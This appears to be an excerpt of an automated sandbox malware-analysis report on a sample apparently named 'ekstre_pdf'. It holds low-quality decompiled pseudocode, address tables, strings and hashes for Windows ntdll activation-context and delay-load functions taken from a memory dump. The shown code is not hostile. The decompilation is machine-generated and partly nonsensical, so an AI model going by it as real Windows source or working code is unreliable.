																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E340EEF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E340EEF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}

0x3407a178
0x3407a17f
0x3407a182
0x3407a18f
0x3407a4b4
0x00000000
0x340c77ce
0x340c77ce
0x00000000
0x340c77ce
0x3407a195
0x3407a195
0x3407a199
0x3407a1a1
0x3407a1a9
0x3407a1b1
0x340c77f3
0x340c77f3
0x00000000
0x3407a1b7
0x3407a1b7
0x3407a1c0
0x00000000
0x3407a1c6
0x3407a1c6
0x3407a1cc
0x3407a5dc
0x00000000
0x3407a5e2
0x00000000
0x3407a5e2
0x3407a1d2
0x3407a1d4
0x00000000
0x3407a1da
0x3407a1da
0x3407a1dd
0x00000000
0x3407a1e3
0x3407a1e3
0x3407a1e6
0x3407a1fa
0x3407a1fd
0x3407a5f0
0x00000000
0x3407a5f6
0x340c77fd
0x340c7802
0x340c7807
0x00000000
0x340c7807
0x3407a203
0x3407a203
0x3407a208
0x3407a20b
0x3407a20f
0x3407a216
0x3407a21c
0x3407a224
0x3407a228
0x3407a22b
0x3407a233
0x3407a23b
0x3407a23f
0x3407a243
0x3407a247
0x3407a250
0x3407a252
0x3407a255
0x00000000
0x00000000
0x3407a25b
0x3407a263
0x3407a26f
0x3407a26f
0x3407a277
0x3407a27d
0x3407a3ae
0x3407a3ae
0x3407a3b4
0x3407a3be
0x340c7823
0x340c7826
0x00000000
0x340c782c
0x340c782c
0x00000000
0x340c782c
0x3407a3c4
0x3407a3c4
0x3407a3c9
0x00000000
0x3407a3c9
0x3407a283
0x3407a283
0x3407a288
0x00000000
0x3407a288
0x3407a265
0x3407a265
0x3407a269
0x3407a4bf
0x3407a4c2
0x3407a4c8
0x3407a4e3
0x340c780e
0x00000000
0x3407a4e9
0x3407a4ec
0x340c7819
0x00000000
0x3407a4f2
0x3407a4f2
0x00000000
0x3407a4f2
0x3407a4ec
0x3407a4ca
0x3407a4ca
0x3407a4cc
0x00000000
0x3407a4d2
0x3407a4d2
0x3407a4d2
0x3407a4d7
0x3407a28c
0x3407a28e
0x340c7833
0x340c7838
0x340c7838
0x00000000
0x3407a294
0x3407a2a5
0x3407a2ac
0x3407a3d2
0x3407a3d9
0x00000000
0x3407a3e8
0x3407a3e8
0x3407a3ec
0x3407a3f0
0x00000000
0x3407a3f0
0x3407a2b2
0x3407a2b2
0x3407a2d2
0x3407a2d6
0x3407a2d8
0x3407a2da
0x3407a2dc
0x3407a2de
0x340c783a
0x340c783c
0x00000000
0x340c7842
0x00000000
0x340c7842
0x3407a2e4
0x3407a2e4
0x3407a2e4
0x3407a2eb
0x340c78ed
0x340c78ed
0x00000000
0x3407a2f1
0x3407a2f1
0x3407a300
0x3407a300
0x3407a300
0x3407a30a
0x00000000
0x00000000
0x3407a310
0x3407a325
0x3407a32c
0x3407a4f7
0x3407a500
0x3407a502
0x3407a505
0x3407a50b
0x3407a5a5
0x3407a5b8
0x3407a5be
0x3407a5c2
0x3407a5cb
0x3407a5d1
0x3407a5d1
0x3407a5cb
0x3407a50b
0x3407a523
0x3407a549
0x3407a551
0x3407a525
0x3407a53c
0x3407a543
0x00000000
0x00000000
0x00000000
0x00000000
0x3407a543
0x3407a332
0x3407a337
0x3407a393
0x3407a399
0x3407a339
0x3407a339
0x3407a342
0x3407a344
0x3407a34a
0x3407a34e
0x3407a355
0x3407a359
0x00000000
0x3407a360
0x3407a363
0x3407a3fa
0x3407a3fc
0x340c7847
0x340c784f
0x00000000
0x340c7855
0x340c7855
0x340c7859
0x00000000
0x340c785f
0x340c785f
0x340c7862
0x340c7868
0x340c7892
0x340c7894
0x00000000
0x00000000
0x00000000
0x00000000
0x340c786a
0x340c786d
0x340c787e
0x340c788b
0x00000000
0x340c7880
0x340c7880
0x340c7885
0x340c789a
0x340c789a
0x340c789f
0x00000000
0x340c789f
0x340c786f
0x340c7873
0x340c788e
0x340c788e
0x00000000
0x340c788e
0x340c786d
0x340c7868
0x340c7859
0x3407a402
0x3407a402
0x3407a405
0x3407a554
0x3407a556
0x3407a55e
0x3407a564
0x3407a56a
0x00000000
0x3407a570
0x3407a570
0x3407a575
0x00000000
0x3407a575
0x3407a40b
0x3407a40e
0x00000000
0x3407a414
0x3407a414
0x3407a418
0x3407a420
0x3407a426
0x3407a42c
0x00000000
0x3407a432
0x3407a432
0x3407a437
0x00000000
0x3407a437
0x3407a42c
0x3407a40e
0x3407a405
0x3407a369
0x3407a369
0x3407a36c
0x340c78e3
0x00000000
0x3407a372
0x3407a372
0x3407a374
0x3407a452
0x3407a459
0x3407a57e
0x3407a585
0x00000000
0x3407a594
0x3407a594
0x3407a598
0x00000000
0x3407a598
0x3407a45f
0x3407a45f
0x3407a47f
0x3407a483
0x3407a485
0x3407a487
0x3407a489
0x3407a48b
0x00000000
0x3407a491
0x3407a493
0x340c78a8
0x340c78b1
0x340c78c3
0x340c78c3
0x340c78cb
0x00000000
0x00000000
0x340c78d6
0x340c78dc
0x00000000
0x340c78de
0x00000000
0x340c78de
0x00000000
0x340c78dc
0x340c78c3
0x340c78b1
0x3407a499
0x3407a499
0x00000000
0x3407a499
0x3407a48b
0x3407a37a
0x3407a37a
0x3407a37f
0x3407a381
0x3407a49b
0x3407a49b
0x3407a4a2
0x00000000
0x3407a4a8
0x00000000
0x3407a4a8
0x3407a387
0x3407a387
0x3407a38c
0x3407a38e
0x3407a38e
0x00000000
0x3407a38c
0x3407a381
0x3407a374
0x3407a36c
0x00000000
0x3407a363
0x3407a360
0x3407a337
0x00000000
0x3407a32c
0x340c78f1
0x340c78f1
0x340c78fc
0x340c7904
0x00000000
0x340c7904
0x3407a2eb
0x3407a2de
0x3407a2ac
0x3407a28e
0x3407a4cc
0x00000000
0x00000000
0x00000000
0x3407a269
0x00000000
0x3407a39c
0x3407a39c
0x3407a39f
0x00000000
0x3407a3a5
0x3407a3a8
0x00000000
0x00000000
0x00000000
0x00000000
0x3407a3a8
0x00000000
0x3407a39f
0x3407a250
0x3407a1e8
0x3407a1f1
0x340c77d8
0x340c77dd
0x340c77e2
0x340c77e7
0x340c77e7
0x340c77e9
0x340c77eb
0x00000000
0x3407a1f7
0x3407a1f7
0x00000000
0x3407a1f7
0x3407a1f1
0x3407a1e6
0x3407a1dd
0x3407a1d4
0x3407a1cc
0x3407a1c0
0x3407a1b1
0x00000000

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 340C7807
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 340C77E2
RtlpFindActivationContextSection_CheckParameters, xrefs: 340C77DD, 340C7802
Actx , xrefs: 340C7819, 340C7880
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 340C78F3
SsHd, xrefs: 3407A304

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: a094e5dee2522a9c1f771de2d62b184cf6cdc66171cd478bd2370c9e17be83f5
Instruction ID: 57596af0e285259e9347232047f466083b620b84d6c4216887d6c5c902b55456
Opcode Fuzzy Hash: a094e5dee2522a9c1f771de2d62b184cf6cdc66171cd478bd2370c9e17be83f5
Instruction Fuzzy Hash: 5BE18AB47043028FE715CE28C890B1A7BE5FF85264F504AADF955AB290D732D849CF97

Uniqueness

Uniqueness Score: -1.00%

Function 3407D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E3407D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x3415b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E340A4B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E340EEF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E3407D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E340EEF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E3407A600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E340B8050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E340B8050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x341591e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E34064428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E340A8170( &_v36, _t228 + _t254, _t211, 0x1c, E3405B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}

0x3407d698
0x3407d6a2
0x3407d6a6
0x3407d6ad
0x3407d6b1
0x3407d6b4
0x3407d6b8
0x3407d6c3
0x3407d6c7
0x3407d6cb
0x3407d90e
0x00000000
0x340c913f
0x340c913f
0x3407d847
0x3407d84b
0x3407d84c
0x3407d84d
0x3407d858
0x3407d858
0x3407d90e
0x3407d6d1
0x3407d6d1
0x3407d6db
0x340c9164
0x340c9164
0x00000000
0x340c9164
0x3407d6e1
0x3407d6ea
0x00000000
0x00000000
0x3407d6f3
0x3407d8fc
0x3407d701
0x3407d704
0x00000000
0x00000000
0x3407d70a
0x3407d70d
0x3407d922
0x00000000
0x00000000
0x340c9149
0x340c914e
0x340c9153
0x340c9158
0x340c9158
0x340c915a
0x340c915c
0x340c9161
0x00000000
0x340c9161
0x3407d713
0x3407d716
0x3407d936
0x00000000
0x00000000
0x340c916e
0x340c9173
0x340c9178
0x00000000
0x340c9178
0x3407d71c
0x3407d71f
0x3407d723
0x3407d72f
0x3407d73c
0x3407d745
0x3407d749
0x3407d751
0x3407d759
0x3407d768
0x00000000
0x00000000
0x3407d76e
0x3407d772
0x00000000
0x00000000
0x3407d778
0x3407d77f
0x3407d8f1
0x3407d8f1
0x340c9370
0x340c9370
0x340c937b
0x340c9380
0x340c9383
0x00000000
0x340c9383
0x3407d785
0x3407d790
0x3407d790
0x3407d790
0x3407d79a
0x00000000
0x00000000
0x3407d7a0
0x3407d7a3
0x3407d7a7
0x3407d80d
0x3407d80d
0x3407d816
0x3407d81c
0x3407d820
0x3407d822
0x3407d826
0x3407d829
0x00000000
0x3407d830
0x3407d833
0x3407d85d
0x3407d860
0x340c92e0
0x340c92e8
0x3407d941
0x3407d941
0x3407d949
0x3407d94f
0x3407d874
0x3407d874
0x3407d87a
0x3407d884
0x00000000
0x00000000
0x3407d886
0x3407d88b
0x3407d83e
0x3407d840
0x3407d891
0x3407d8a5
0x3407d8ac
0x340c933a
0x3407d8dc
0x3407d8de
0x340c935b
0x00000000
0x00000000
0x00000000
0x340c9361
0x3407d8e4
0x3407d8eb
0x00000000
0x00000000
0x00000000
0x340c9349
0x340c9349
0x340c934d
0x00000000
0x340c934d
0x340c933a
0x3407d8b2
0x3407d8d2
0x3407d8d6
0x3407d8d8
0x3407d8da
0x00000000
0x3407d8da
0x3407d842
0x3407d842
0x00000000
0x3407d842
0x3407d955
0x3407d95a
0x00000000
0x3407d95a
0x340c92ee
0x340c92f2
0x00000000
0x00000000
0x340c92f8
0x340c92fb
0x340c9301
0x340c931f
0x340c9321
0x00000000
0x00000000
0x340c9327
0x340c9327
0x340c932c
0x00000000
0x340c932c
0x340c9306
0x340c9313
0x340c931c
0x00000000
0x340c931c
0x340c9315
0x00000000
0x340c9315
0x340c9308
0x00000000
0x340c9308
0x3407d866
0x3407d869
0x00000000
0x00000000
0x3407d872
0x00000000
0x00000000
0x00000000
0x3407d872
0x3407d835
0x3407d838
0x340c9366
0x00000000
0x340c9366
0x00000000
0x3407d838
0x3407d830
0x3407d7ad
0x340c917f
0x340c917f
0x3407d7b3
0x3407d7b8
0x340c9188
0x00000000
0x00000000
0x340c9194
0x340c91a5
0x340c91ac
0x340c91ae
0x340c91b0
0x340c91b7
0x00000000
0x00000000
0x00000000
0x00000000
0x340c91bd
0x340c91bd
0x340c91c8
0x340c91ca
0x340c91d7
0x00000000
0x00000000
0x340c91e5
0x340c91e6
0x340c91ec
0x340c91f0
0x00000000
0x00000000
0x00000000
0x340c91f2
0x3407d7be
0x3407d7be
0x3407d7c2
0x3407d7c5
0x340c91f7
0x340c91fa
0x340c91fe
0x340c9213
0x340c9216
0x340c921a
0x340c921d
0x00000000
0x00000000
0x00000000
0x340c921f
0x340c9224
0x3407d805
0x3407d807
0x340c9231
0x00000000
0x00000000
0x340c9237
0x340c923d
0x340c9244
0x340c924e
0x340c9254
0x340c925c
0x340c9261
0x340c9261
0x340c925c
0x340c926d
0x340c926f
0x340c9274
0x340c9286
0x340c9299
0x340c929f
0x340c92a1
0x340c92aa
0x340c92ae
0x340c92b0
0x340c92b0
0x340c92ae
0x340c9274
0x340c92b6
0x340c92d9
0x340c92d9
0x00000000
0x340c92b6
0x00000000
0x3407d807
0x3407d7cb
0x3407d7d9
0x3407d7e0
0x3407d7e7
0x3407d7ee
0x3407d7fb
0x3407d800
0x3407d803
0x3407d803
0x00000000
0x3407d7b8
0x00000000
0x3407d790
0x00000000
0x3407d902
0x3407d6fb
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 340C9299

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 340C9178
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 340C9153
RtlpFindActivationContextSection_CheckParameters, xrefs: 340C914E, 340C9173
Actx , xrefs: 340C9315
GsHd, xrefs: 3407D794
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 340C9372

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 60e22889740de0efd270d050370987b660c86969a3176894822c3607e5c504a4
Instruction ID: 6655b63dc5db00e63b974709a64c28e2d1de154a51ba7da9de5ad27a2e17cf46
Opcode Fuzzy Hash: 60e22889740de0efd270d050370987b660c86969a3176894822c3607e5c504a4
Instruction Fuzzy Hash: 03E17A74704342CFE750CF24C880B5EBBE4BF88358F404AADE8A58B291D775E949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 340DFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E340DFA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E340DF899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x341537c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E340DE692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x341537c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x3415391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x341591e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E34096010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x341591e0(4,  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

0x340dfa10
0x340dfa12
0x340dfa18
0x340dfa1d
0x340dfa2b
0x340dfa30
0x340dfa35
0x340dfa3a
0x340dfa3c
0x340dfa40
0x340dfa42
0x340dfa42
0x340dfa47
0x340dfa50
0x340dfa51
0x340dfa54
0x340dfa6d
0x340dfa72
0x340dfa77
0x340dfa7c
0x340dfa7e
0x340dfa7e
0x340dfa81
0x340dfa99
0x00000000
0x340dfa83
0x340dfa8a
0x340dfa8d
0x340dfa9b
0x340dfa9b
0x00000000
0x340dfa95
0x340dfa95
0x340dfa9d
0x340dfa9d
0x340dfaa2
0x340dfb01
0x340dfb01
0x340dfb06
0x340dfb0a
0x340dfb0c
0x340dfb0c
0x340dfb15
0x340dfb1d
0x340dfb1d
0x00000000
0x340dfaa8
0x340dfaae
0x340dfab4
0x340dfaba
0x340dfabd
0x340dfac4
0x340dfac7
0x340dfacf
0x340dfad4
0x340dfae5
0x340dfae8
0x340dfad6
0x340dfad6
0x340dfadd
0x340dfadd
0x340dfaf3
0x340dfafb
0x340dfaff
0x340dfb21
0x340dfb25
0x00000000
0x00000000
0x00000000
0x340dfaff
0x340dfaa2
0x340dfa8d

APIs

RtlDebugPrintTimes.NTDLL ref: 340DFAF3
RtlDebugPrintTimes.NTDLL ref: 340DFB15

Strings

LdrpRedirectDelayloadFailure, xrefs: 340DFA5E
